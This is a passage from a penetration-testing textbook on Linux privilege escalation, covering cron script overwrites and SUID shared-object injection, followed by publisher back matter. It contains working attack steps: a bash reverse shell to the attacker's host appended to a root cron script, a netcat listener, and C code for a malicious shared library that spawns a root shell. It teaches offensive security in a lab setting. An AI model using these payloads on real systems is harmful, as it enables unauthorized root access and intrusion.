Escalation via cron file overwrites

Another technique we can leverage to elevate our privileges is the ability to overwrite the content of scripts that are used by cron jobs. In the previous sections, we explored the process of leveraging misconfigured paths and utilizing wildcards. However, we did not explore the process of overwriting the content of scripts or files to elevate our privileges.

Note

The success and viability of this technique will depend on whether we have the necessary permissions to write or make changes to the script or file being run by the cron job.

This technique can be performed by following these steps:

The first step in this process involves identifying a cron job that executes a script or binary with read and write permissions as the root user. In this case, we can identify a cron job that runs the overwrite.sh script when invoked, as highlighted in the following screenshot:

Figure 12.18 – Overwrite cron job

We looked at how to exploit this particular cron job in section two of this chapter, Escalation via cron paths, where we exploited a misconfigured path that allowed us to create a custom overwrite.sh script that provided us with an elevated reverse shell when executed. This was because the default path variable specified the user account's home directory as the primary directory for the cron job. However, if the overwrite.sh script is not found in the first directory, cron will check the other directories specified in the $PATH variable, as highlighted in the following screenshot:

Figure 12.19 – Crontab paths

In this case, we do not find the overwrite.sh script in the user account's home directory. As a result, we can search for the script in the other directories specified in the $PATH variable. This can be done by listing the contents of each directory, as follows:

ls -al /usr/local/bin | grep overwrite.sh

Alternatively, you can use the locate utility to search for the overwrite.sh script by running the following command:

locate overwrite.sh

In this case, we will find the file under the /usr/local/bin directory, as highlighted in the following screenshot:

Figure 12.20 – Locating the script

The next step involves identifying the permissions of the overwrite.sh to determine whether we can make changes or overwrite the content of the script. This can be done by running the following command:

ls -al /usr/local/bin | grep overwrite.sh

The output is shown in the following screenshot:

Figure 12.21 – File permissions

In this case, we can determine that the script has read and write permissions. As a result, we can make changes or overwrite the file with our own commands.

Now, let's add a bash command that will provide us with a reverse shell to the overwrite.sh script. This can be done by running the following command:

echo "bash -i >& /dev/tcp/<KALI-IP>/<PORT> 0>&1" >> /usr/local/bin/overwrite.sh

This command will append a bash command that will connect to our reverse listener on the Kali Linux VM. Ensure that you replace the fields in the command with the respective IP address and port number.

After running the preceding command, the overwrite.sh script should contain the command outlined in the following screenshot:

Figure 12.22 – The overwrite.sh script's appended command

Once we have appended the bash command, we will need to set up a reverse listener with Netcat.

We can set up the reverse listener on the Kali VM by running the following command:

nc -nvlp <PORT>

Ensure that you specify the port that you used in the overwrite.sh script.

After appending the bash command to the overwrite.sh script, we will need to wait for a few minutes for the cron job to be invoked, after which we should receive an elevated reverse shell on our Netcat listener, as highlighted in the following screenshot:

Figure 12.23 – Reverse shell

With that, we have successfully elevated our privileges by exploiting cron jobs that run scripts with misconfigured permissions to execute a reverse shell payload as the root user.

You should now have a firm grasp of how to enumerate the cron jobs running on a system, as well as how to exploit them through various techniques to elevate your privileges.

Summary

In this chapter, we started by looking at how the cron utility works and the structure of the crontab file. We then took an in-depth look at how to exploit misconfigured cron paths. We also explored the process of exploiting wildcards in scripts executed by cron jobs to elevate our privileges. Finally, we ended this chapter by looking at how to elevate our privileges through cron file overwrites.

In the next chapter, we will look at how to exploit SUDO and SUID binaries to elevate our privileges.

===== FILE 20/21: B17389_13_Final_PG_ePub.xhtml =====

Chapter 13: Exploiting SUID Binaries

We will conclude the privilege escalation process on Linux by exploring the process of searching for and exploiting SUID binaries on Linux, which helps elevate the privileges on the target system.

We will start this chapter by looking at how filesystem permissions work on Linux, after which we will look at how SUID permissions work and how they are applied. We will then look at how to search for and identify vulnerable or misconfigured SUID binaries, before exploring the various techniques that can be used to exploit improperly configured SUID binaries to elevate our privileges.

In this chapter, we're going to cover the following main topics:

Introduction to filesystem permissions on Linux
Searching for SUID binaries
Escalation via shared object injection
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you are familiar with Linux Terminal commands.

You can view this chapter's code in action here: https://bit.ly/39Kdn1t

Introduction to filesystem permissions on Linux

Before we begin exploring the process of exploiting SUID binaries to elevate our privileges, we need to take a brief look at filesystem permissions on Linux and how they can be used to provide or limit access to files and directories. This will help us set up the stage for our foray into SUID binaries, how they are configured, and how they can be exploited.

Filesystem permissions on Linux are used to grant or limit access to files and directories. This is a very useful feature as it allows users to restrict access to particular files or directories, thus preventing any unauthorized access.

We can list the permissions of a file or folder on Linux by running the following command:

ls -al

As highlighted in the following screenshot, this command will output a list of all the files in a directory and all their attributes, including their access permissions and ownership details:

Figure 13.1 – File permissions

Linux provides multi-user support. Due to this, access to files and data is restricted based on the following key elements:

File ownership: This refers to the specific user or group that owns the file.
Access permissions: This refers to the specific permissions that are used to allow or restrict access to specific files.

Every file and directory on Linux has an owner and specific file permissions that are used to prevent unauthenticated or unauthorized access to it.

In the case of ownership, Linux divides file ownership into three main categories:

User: This is used to specify the owner of the file. Typically, the creator of a file becomes the owner of the file.
Group: This is used to specify the group ownership or access to a file, whereby all users of a group will have the same permissions and access to the file. Only members of the group will be able to read, write, or execute the file based on the file's access permissions.
Other: This is used to refer to read, write, or execute permissions for other users on the system who are not the owner or part of a group that has ownership of the file.

The following screenshot outlines the file ownership categorization of a file on Linux, whereby the access permissions are used to dictate the type of access the owner, group, and other users on the system have to a specific file on the system:

Figure 13.2 – Linux file ownership

Now that we have an understanding of how file ownership is handled and implemented on Linux, let's take a look at how access permissions are configured.

Every file and directory on Linux has specific access permissions attributed to it that determine whether the file can be read, modified, or executed. Linux divides these access permissions into three categories based on the type of access you wish to provide to users and groups on the system:

Read: This permission provides users with the ability to read a file and is denoted by the letter r.
Write: This permission provides users with the ability to modify or make changes to a file and is denoted by the letter w.
Execute: This permission provides users with the ability to execute or run a file and is denoted by the letter x.

The following screenshot outlines the access permissions of a particular file for the owner, group, and other users on the system:

Figure 13.3 – File access permissions

In this case, the owner of the file has read, write, and execute permissions and both the group and other users only have read and execute permissions, thus restricting them from making changes to the file.

This example demonstrates the importance of file ownership and access permissions on Linux, as well as how they can be used to limit or grant access to files and resources on a system.

Changing permissions

To change file and directory permissions, we can use the chmod command, which is an abbreviation for change mode.

The syntax of the chmod command can be defined by various formats. One of the most commonly used formats is the symbolic mode format. It provides users with a simple and easy-to-understand syntax for modifying, setting, and removing permissions. The following table shows all the arguments and their corresponding functions:

Let's take a look at how to use chmod to modify file and directory permissions.

I will be using a simple Bash script as a test file to demonstrate how permissions can affect access.

If we want to add permissions to the file, we can use the + symbol. Let's give the script executable permissions. We can do this by using the following syntax:

chmod +x script.sh

If we want to give the executable permission to all users, we can use the following command:

chmod u+x script.sh

We can also use multiple permissions in a single command and use a comma to separate the options. This command will give groups executable permissions and will give all users and groups write permissions:

chmod g+x, a+w script.sh

If we want to remove permissions from a file, we can use the - symbol. This command will remove all the executable permissions for all users. This will prevent the script from being executed:

chmod a-x script.sh

Now that you have a functional understanding of how filesystem permissions work on Linux, we can begin exploring the SUID permission, how it works, and how it is used.

Understanding SUID permissions

In addition to the three main file access permissions (read, write, and execute), Linux also provides users with specialized permissions that can be utilized in specific situations. One of these access permissions is the Set Owner User ID (SUID) permission.

When applied, this permission allows users to execute a script or binary with the permissions of the file owner, as opposed to the user who is running the script or binary.

SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with root permissions. However, note that the provision of elevated privileges is limited to the execution of the script and does not translate to elevated privileges. However, if they haven't been configured properly, unprivileged users can exploit misconfigurations or vulnerabilities within the binary or script to obtain an elevated session.

Files or binaries with the SUID access permission can easily be identified by listing the respective ownership permissions of the file. If applied to a file or binary, the execute permission (denoted by the letter x) will be replaced with the SUID permission, denoted by the letter s, as highlighted in the following screenshot:

Figure 13.4 – SUID permission

As highlighted in the preceding screenshot, the owner of the file has the SUID access permission applied, while the members of the group and other users on the system have read and execute permissions, but not write permissions. In this case, the members of the group and other users on the system will be able to execute the binary with root privileges, since the owner of the file is the root user.

This permission can be extremely useful as it provides administrators with granular control over files or binaries, who can access them, whether they can be executed, and the permissions they will be executed with.

This is the functionality that we will be attempting to exploit in this chapter to elevate our privileges. However, as you have probably noticed, the success of our attack will depend on the following factors:

Owner of the SUID binary: Given that we are attempting to elevate our privileges, we will only be exploiting SUID binaries that are owned by the root user or other privileged users.
Access permissions: We will require executable permissions to execute the SUID binary.

Now that we have an understanding of how SUID permissions work, let's take a look at how to search for and identify SUID binaries on the target system.

Searching for SUID binaries

The process of searching for and identifying SUID binaries on the target system can be performed both manually and automatically. We will look at how to do both as it is vitally important to know how to search for SUID binaries manually, in the event you are working in a restricted environment that is not conducive for running automated tools.

In this chapter, we will be utilizing the VM we set up in Chapter 11, Linux Password Mining.

We will begin by learning how to search for SUID binaries manually by utilizing built-in Linux utilities.

Searching for SUID binaries manually

You can search for SUID binaries manually by utilizing the built-in find utility on Linux. This allows you to search for SUID binaries on the target system. To do so, run the following command:

find / -type f -perm -u=s -ls 2>/dev/null

This command will search for files that have the SUID access permission set for the file owner and will display the respective owner of each file or binary.

As highlighted in the following screenshot, we can identify quite a few binaries that have SUID permissions. In this case, they are all owned by the root user:

Figure 13.5 – Searching for SUID binaries manually

The next logical step would be to identify the SUID binaries that can be exploited to elevate our privileges. However, before we can do that, we need to explore the process of searching for SUID binaries automatically.

Searching for SUID binaries with linPEAS

We can automate the process of searching for SUID binaries by utilizing automated enumeration tools. In this case, we will utilize the linPEAS script to enumerate information from our target.

Note

linPEAS is a local Linux enumeration script that searches and scans for potential vulnerabilities, and also enumerates all important system information that can be used to stage a privilege escalation attack.

The linPEAS binary can be downloaded from the following GitHub repository: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS.

Ensure you download the linpeas.sh Bash script, as highlighted in the following screenshot:

Figure 13.6 – linPEAS Bash script

After downloading the Bash script to our Kali VM, we need to transfer the linpeas.sh file to our target VM. This cannot be done automatically as we do not have a Meterpreter session. As a result, we will need to make use of Linux-specific utilities to download the binary.

To transfer the linpeas.sh file to our target, we will need to set up a web server on our Kali VM that will be used to host the file. This will allow us to download it on the target system. This can be done by following these steps:

To set up a web server on our Kali VM, we can utilize the SimpleHTTPServer Python module to serve the script. This can be done by running the following command in the directory where the linpeas.sh binary is stored:

sudo python -m SimpleHTTPServer 80

Note

SimpleHTTPServer is a Python module for Python2 that is also available as http.server for Python3.

As highlighted in the following screenshot, the SimpleHTTPServer module will serve the files in the directory on the Kali VM IP address on port 80:

Figure 13.7 – SimpleHTTPServer linpeas

To download the linpeas.sh file on the target system, we can utilize the wget utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the temporary directory, as illustrated in the following screenshot:

Figure 13.8 – Linux temporary directory

We can now use the wget utility to download the file from the Kali VM to our target system. This can be done by running the following command on the target system:

wget http://<KALI-VM-IP>/linpeas.sh

The output is shown in the following screenshot:

Figure 13.9 – wget linpeas

As shown in the preceding screenshot, if the transfer is successful, the linpeas.sh file should be downloaded and saved with the name we specified.

The linpeas.sh script enumerates a lot of information and will perform various checks to discover potential vulnerabilities on the target system. We can use the linpeas.sh script to enumerate and locate SUID binaries on the target system.

To enumerate all important system information, we need to run the linpeas.sh script. However, before we do that, we need to ensure the script has executable permissions. This can be done by running the following command on the target:

chmod +x linpeas.sh

We can now run the linpeas.sh script by running the following command on the target:

./linpeas.sh

As highlighted in the following screenshot, the script will enumerate system information and display a list of SUID binaries on the target system:

Figure 13.10 – linPEAS SUID binaries

In this case, we can identify the same SUID binaries we found with our manual search. However, linPEAS also provides us with additional information regarding potential vulnerabilities for each SUID binary that can be exploited. This information will come in handy in the upcoming sections of this chapter.

Now that we have been able to search for and identify all the SUID binaries on the target system, we can start exploring the process of identifying the SUID binaries that are vulnerable and can be exploited.

Identifying vulnerable SUID binaries

Identifying vulnerable SUID binaries that can be exploited to provide us with elevated privileges can be a very manual process and differs from system to system, based on the SUIDs that are available. However, we can streamline this process by utilizing a resource called GTFOBins.

GTFOBins is a curated list of Unix binaries that can be exploited to bypass local security restrictions and, in our case, elevate our privileges.

More information about GTFOBins can be found here: https://gtfobins.github.io/.

We can use the information outlined on the GTFOBins website to identify binaries on our target system that can be exploited to elevate our privileges.

The GTFOBins website has a dedicated SUID category that provides us with a list of SUID binaries that are vulnerable and can be accessed by clicking on the SUID category, as highlighted in the following screenshot:

Figure 13.11 – GTFOBins SUID category

The SUID category will provide you with an alphabetically sorted list of vulnerable SUID binaries and their respective functions, as highlighted in the following screenshot:

Figure 13.12 – GTFOBins vulnerable SUID binaries

We can use this list of vulnerable SUID binaries to identify any potential matches with the SUID binaries on our target system. However, in our case, we weren't able to identify any matches. As a result, we will have to analyze the SUID binaries on the target system to identify any potential vulnerabilities that can be exploited.

Also, note that you should not disregard the GTFOBins resource in your future assessments as you may come across targets that do have a vulnerable SUID binary that can be exploited.

In this case, we will have to take on a much more manual approach that will require analyzing the SUID binaries on the target system.

Escalation via shared object injection

In the previous section, Searching for SUID binaries, we identified the SUID binaries on the target system with linPEAS. However, in addition to listing the SUID binaries, linPEAS also performed additional vulnerability checks on the SUID binaries to determine whether they can be exploited.

Analyzing the linPEAS results closely reveals that linPEAS executes and checks the binaries with the strace utility to identify the shared objects utilized by the binary.

Note

strace is a Linux utility that is used to monitor and debug applications and processes and their interaction with the Linux kernel.

linPEAS runs each SUID binary with strace to identify the shared objects that are used by the binary and lists their respective locations, as highlighted in the following screenshot:

Figure 13.13 – linPEAS shared objects

As highlighted in the preceding screenshot, we can identify the suid-so binary as a potential target as it utilizes several shared objects that do not exist on the target system. However, one specific shared object file should have caught your attention: the suid-so binary utilizes a shared object named libcalc.so that is stored in the user account's home directory.

Note

Shared objects are the Linux equivalent of Dynamically Linked Libraries (DLLs) on Windows and are used by Linux applications to provide additional functionality.

Given that we are currently logged on to the target system as the user account, we should be able to modify the shared library that is being utilized by the SUID binary to execute arbitrary commands. In our case, this will provide us with an elevated session when the suid-so binary is executed.

This attack works quite similarly to the Windows DLL injection technique, where we replaced the target DLL with a modified one that provided us with an elevated reverse shell when the target service was executed.

Before we begin the exploitation phase, we should analyze what the suid-so binary does by executing it, given that the binary is stored in the /usr/local/bin directory. We can execute it directly by running the following command:

suid-so

Running the binary does not reveal any useful information as it simply performs a calculation and provides a progress bar for the calculation, as highlighted in the following screenshot:

Figure 13.14 – Executing an SUID binary

Alternatively, we can analyze what shared objects the binary uses manually with the strace utility as opposed to using automated tools. This can be done by running the following command:

strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"

This command will run the suid-so binary with the strace utility and limit the output produced by strace with grep, This will ensure that only the shared objects that have been utilized by the binary are displayed:

Figure 13.15 – strace SUID binary shared objects

As highlighted in the preceding screenshot, we can identify the libcal.so shared object in the user account's home directory, as we did when we used the linPEAS script.

We can also search for useful strings in the binary by using the built-in strings utility. This can be done by running the following command:

strings /usr/local/bin/suid-so

As highlighted in the following screenshot, the strings utility will output a list of strings that were found in the suid-so binary:

Figure 13.16 – Finding useful strings

In this case, we can determine that the application utilizes the libcalc.so shared object in the user account's home directory. The strings utility can prove to be very useful if you do not have access to the strace utility or any automated enumeration scripts such as linPEAS.

Now that we have an idea of what the suid-so binary does, what shared objects it utilizes, and have identified a vulnerable shared object, we can begin the privilege escalation process.

The privilege escalation process can be performed by following these steps:

The first step in this process involves checking whether the libcalc.so file exists. This can be done by listing the contents of the user account's home directory:

ls -al /home/user/

As shown in the following screenshot, the user account's home directory does not contain the .config directory, which contains the libcalc.so shared object file. As a result, we will have to create the .config directory and compile the shared object file ourselves:

Figure 13.17 – The user's home directory

We can create the .config directory in the user account's home directory by running the following command:

mkdir /home/user/.config

Once we have created the .config directory, we need to create the libcalc.c file. This can be done by running the following command:

touch /home/user/.config/libcalc.c

The next step involves adding our custom C code to the libcalc.c file that we will compile. Open the libcalc.c file we just created with your terminal text editor of choice. In my case, I will use VIM and add the following C code:

#include <stdio.h>

#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {

system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");

}

This C code utilizes a custom function called inject that runs a system command that copies the Bash binary into the Linux temp directory. After doing this, it will assign SUID permissions to the Bash binary and execute it from the temp directory. Because the suid-so binary runs as the root user and calls the libcalc.so shared object, the custom libcalc.so shared object file will also be executed with root permissions and provide us with an elevated Bash session.

Note

You can also use your own C reverse shellcode in libcalc.c, which will connect to a reverse listener and provide you with an elevated reverse shell.

Once you have added the custom code, ensure that you indent it correctly, as shown in the following screenshot:

Figure 13.18 – Custom libcalc.c code

After indenting and formatting the code accordingly, ensure that you save it before continuing. Now, we need to compile the libcalc.c file so that we have the libcalc.so shared object file.

We can compile the custom libcalc.c file with Gnu C Compiler (GCC) by running the following command:

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

This command will compile the custom libcalc.c file and provide us with the custom libcalc.so shared object file, which will provide us with an elevated session.

Note

When compiling our custom code with the GNU C Compiler (gcc), we used the -fPIC flag, which ensures that the code in our shared library is position-independent and can be loaded by any address in memory.

After compiling the libcalc.c file, you should now have the custom libcalc.so file in the user account's home directory, as highlighted in the following screenshot:

Figure 13.19 – Compiled libcalc.so shared object

Now that we have our custom libcalc.so shared file ready, we can execute the suid-so binary.

To execute the custom libcalc.so shared object file, we need to execute the suid-so binary. This can be done by running the following command:

suid-so

If you have followed the previous steps correctly, running the suid-so binary should provide you with a Bash session, as highlighted in the following screenshot:

Figure 13.20 – Bash session

We can confirm that we have an elevated session with root access by running the following command:

id

Alternatively, you can identify the user you are currently logged on as by running the following command:

whoami

As highlighted in the following screenshot, we should have an elevated session as the root user:

Figure 13.21 – Elevated Bash session

With that, we successfully elevated our privileges by exploiting an improperly configured SUID binary, which utilized a shared object file that was stored in an unprivileged user account's home directory.

Various techniques can be used to exploit SUID binaries. However, the most important factor in this process involves thoroughly enumerating and gathering as much information as possible from the target SUID, and then analyzing it for potential misconfigurations or vulnerabilities. This process will differ from target to target and, as a result, requires a keen eye and a methodological approach to help identify misconfigurations or vulnerabilities in SUID binaries.

Summary

In this chapter, we started by looking at how filesystem permissions work on Linux and how SUID permissions are used. We then took an in-depth look at how to search for and identify SUID binaries on the target system, both manually and automatically. We also briefly explored the process of identifying vulnerable SUID binaries, before looking at how to elevate our privileges by exploiting misconfigured SUID binaries.

If you have made it this far, congratulations! You should now be well-versed in elevating your privileges on both Windows and Linux by leveraging and exploiting various vulnerabilities on both operating systems.

If this was your initial foray into the process of privilege escalation, you should now have the necessary skills to identify and exploit vulnerabilities on target systems to elevate your privileges.

This book was designed to be a practical guide on how to enumerate as much information as possible from Windows and Linux targets, as well as how to use this information to identify vulnerabilities that can be exploited to elevate your privileges. This book sought to accomplish this by providing practical exercises that tested and verified what you learned in each chapter.

This book covered all of the most important privilege escalation vectors for both Windows and Linux systems, and it also provided you with real-world scenarios where these vectors can be exploited.

I hope you enjoyed this book, found value in every chapter, regardless of your skill level, and have been able to improve your privilege escalation skills to enhance your skillset as a penetration tester.

===== FILE 21/21: B17389_Backmatter_Final_PG_ePub.xhtml =====

Packt.com

Subscribe to our online digital library for full access to over 7,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website.

Why subscribe?
Spend less time learning and more time coding with practical eBooks and Videos from over 4,000 industry professionals
Improve your learning with Skill Plans built especially for you
Get a free eBook or video every month
Fully searchable for easy access to vital information
Copy and paste, print, and bookmark content

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at packt.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at customercare@packtpub.com for more details.

At www.packt.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks.

Other Books You May Enjoy

If you enjoyed this book, you may be interested in these other books by Packt:

Cybersecurity Career Master Plan

Dr. Gerald Auger, Jaclyn "Jax" Scott, Jonathan Helmus, Kim Nguyen

ISBN: 978-1-80107-356-1

Gain an understanding of cybersecurity essentials, including the different frameworks and laws, and specialties
Find out how to land your first job in the cybersecurity industry
Understand the difference between college education and certificate courses
Build goals and timelines to encourage a work/life balance while delivering value in your job
Understand the different types of cybersecurity jobs available and what it means to be entry-level
Build affordable, practical labs to develop your technical skills
Discover how to set goals and maintain momentum after landing your first cybersecurity job

Antivirus Bypass Techniques

Nir Yehoshua, Uriel Kosayev

ISBN: 978-1-80107-974-7

Explore the security landscape and get to grips with the fundamentals of antivirus software
Discover how to gather AV bypass research leads using malware analysis tools
Understand the two commonly used antivirus bypass approaches
Find out how to bypass static and dynamic antivirus engines
Understand and implement bypass techniques in real-world scenarios
Leverage best practices and recommendations for implementing antivirus solutions
Packt is searching for authors like you

If you're interested in becoming an author for Packt, please visit authors.packtpub.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.

Share Your Thoughts

Now you've finished Privilege Escalation Techniques, we'd love to hear your thoughts! If you purchased the book from Amazon, please click here to go straight to the Amazon review page for this book and share your feedback or leave a review on the site that you purchased it from.

Your review is important to us and the tech community and will help us make sure we're delivering excellent quality content.

Other Books You May Enjoy
